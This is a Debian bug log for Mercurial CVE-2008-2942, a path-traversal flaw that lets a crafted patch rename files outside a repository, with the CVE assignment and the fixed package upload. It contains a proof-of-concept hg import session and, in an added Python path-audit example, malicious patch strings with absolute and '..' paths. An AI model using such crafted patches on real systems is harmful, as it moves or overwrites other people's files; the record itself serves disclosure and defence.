Debian Bug report logs - #488628
mercurial: CVE-2008-2942 Insufficient input validation


Package: mercurial; Maintainer for mercurial is Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>; Source for mercurial is src:mercurial.

Reported by: Steffen Joeris <steffen.joeris@skolelinux.de>

Date: Mon, 30 Jun 2008 07:54:07 UTC

Severity: grave

Tags: patch, security

Fixed in version mercurial/1.0.1-2

Done: Vincent Danjean <vdanjean@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>.

Message #5 received at submit@bugs.debian.org:

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: mercurial: Insufficient input validation
Date: Mon, 30 Jun 2008 09:42:05 +0200
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole

Hi

It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory

hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root

cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux


The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4
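In the session above the rename has already happened by the time hg reports "not under root". As an added example that is not part of the bug report or of Mercurial's patch.py, the following Python audit pulls every path out of the git-style patch headers and rejects the patch up front when any of them is absolute or climbs past the repository root with ".." (the two forms the report and the CVE text describe); `under_root`, `header_paths`, `audit_patch_paths`, the two constructed patch variants and the root `/srv/repo` are all assumed names and values.

```python
import os
import re

# Added example for this report, not Mercurial's own patch.py: audit the file
# paths named in git-style patch headers before anything is renamed or written.
# Assumes a POSIX filesystem and a repository root given as an absolute path.
DIFF_GIT = re.compile(r'^diff --git a/(\S+) b/(\S+)$')
RENAME_COPY = re.compile(r'^(?:rename|copy) (?:from|to) (.+)$')


def under_root(root, path):
    """True iff *path* as written in the patch resolves inside *root*.

    Absolute paths and '..' components that climb above root are caught by
    string normalisation alone, so no file is touched before the verdict.
    """
    root = os.path.abspath(root)
    if os.path.isabs(path):
        return False
    full = os.path.normpath(os.path.join(root, path))
    return full == root or full.startswith(root + os.sep)


def header_paths(line):
    """File names a single patch header line refers to (none for other lines)."""
    m = DIFF_GIT.match(line)
    if m:
        return [m.group(1), m.group(2)]
    m = RENAME_COPY.match(line)
    return [m.group(1)] if m else []


def audit_patch_paths(root, patch_text):
    """Return [(line_no, path), ...] for every header path escaping *root*.

    Only an empty result means the patch may be applied; the PoC above fails
    here before any rename is attempted, instead of aborting after the move.
    """
    return [(n, p)
            for n, line in enumerate(patch_text.splitlines(), 1)
            for p in header_paths(line)
            if not under_root(root, p)]


# The patch from the report above (absolute paths) plus two constructed variants.
POC_PATCH = "diff --git a/a b/b\nrename from /tmp/foo\nrename to /tmp/bar\n"
DOTDOT_PATCH = "diff --git a/a b/b\nrename from a\nrename to ../outside/escaped.txt\n"
SAFE_PATCH = "diff --git a/a b/b\nrename from a\nrename to sub/../b\n"
```

Running `audit_patch_paths("/srv/repo", POC_PATCH)` returns both offending rename lines, while the in-tree `sub/../b` rename in `SAFE_PATCH` passes because it normalises to a path still under the root.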




Information forwarded to debian-bugs-dist@lists.debian.org, Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>:
Bug#488628; Package mercurial.

Acknowledgement sent to Nico Golde <nion@debian.org>:
Extra info received and forwarded to list. Copy sent to Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>.

Message #10 received at 488628@bugs.debian.org:

From: Nico Golde <nion@debian.org>
To: 488628@bugs.debian.org
Subject: Re: mercurial: Insufficient input validation
Date: Mon, 30 Jun 2008 21:40:23 +0200
Hi,
the following CVE id has been assigned to this issue; please
reference it in the changelog when closing this bug.

Name: CVE-2008-2942
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2942
Reference: CONFIRM:http://www.selenic.com/hg/rev/87c704ac92d4
Reference: MLIST:[oss-security] 20080630 CVE id request mercurial:Insufficient input validation
Reference: URL:http://www.openwall.com/lists/oss-security/2008/06/30/1

Directory traversal vulnerability in patch.py in Mercurial 1.0.1
allows user-assisted attackers to modify arbitrary files via ".." (dot
dot) sequences in a patch file.


Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.

Changed Bug title to `mercurial: CVE-2008-2942 Insufficient input validation' from `mercurial: Insufficient input validation'. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Mon, 30 Jun 2008 19:42:05 GMT)

Reply sent to Vincent Danjean <vdanjean@debian.org>:
You have taken responsibility.

Notification sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Bug acknowledged by developer.

Message #17 received at 488628-close@bugs.debian.org:

From: Vincent Danjean <vdanjean@debian.org>
To: 488628-close@bugs.debian.org
Subject: Bug#488628: fixed in mercurial 1.0.1-2
Date: Tue, 01 Jul 2008 17:17:10 +0000
Source: mercurial
Source-Version: 1.0.1-2

We believe that the bug you reported is fixed in the latest version of
mercurial, which is due to be installed in the Debian FTP archive:

mercurial-common_1.0.1-2_all.deb
  to pool/main/m/mercurial/mercurial-common_1.0.1-2_all.deb
mercurial_1.0.1-2.diff.gz
  to pool/main/m/mercurial/mercurial_1.0.1-2.diff.gz
mercurial_1.0.1-2.dsc
  to pool/main/m/mercurial/mercurial_1.0.1-2.dsc
mercurial_1.0.1-2_i386.deb
  to pool/main/m/mercurial/mercurial_1.0.1-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 488628@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Vincent Danjean <vdanjean@debian.org> (supplier of updated mercurial package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)



Format: 1.8
Date: Tue, 01 Jul 2008 18:44:19 +0200
Source: mercurial
Binary: mercurial mercurial-common
Architecture: all i386 source 
Version: 1.0.1-2
Distribution: unstable
Urgency: high
Maintainer: Python Applications Packaging Team <python-apps-team@lists.alioth.debian.org>
Changed-By: Vincent Danjean <vdanjean@debian.org>
Closes: 488628
Description:
 mercurial-common - Scalable distributed version control system (Common files)
 mercurial  - Scalable distributed version control system
Changes:
 mercurial (1.0.1-2) unstable; urgency=high
 .
   * Backport from upstream: fix CVE-2008-2942 Insufficient input validation
     (Closes: #488628)






Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 11 Jul 2009 07:29:23 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 25 08:39:03 2014; Machine Name: buxtehude.debian.org
